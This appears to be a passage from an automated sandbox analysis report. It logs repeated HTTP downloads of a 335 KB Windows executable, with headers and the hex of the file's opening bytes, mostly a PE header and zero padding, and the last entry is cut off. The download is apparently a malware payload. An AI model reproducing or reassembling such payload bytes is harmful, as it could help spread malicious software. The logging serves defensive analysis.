          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:44 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:50 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:58 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:59 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:01 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:11 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 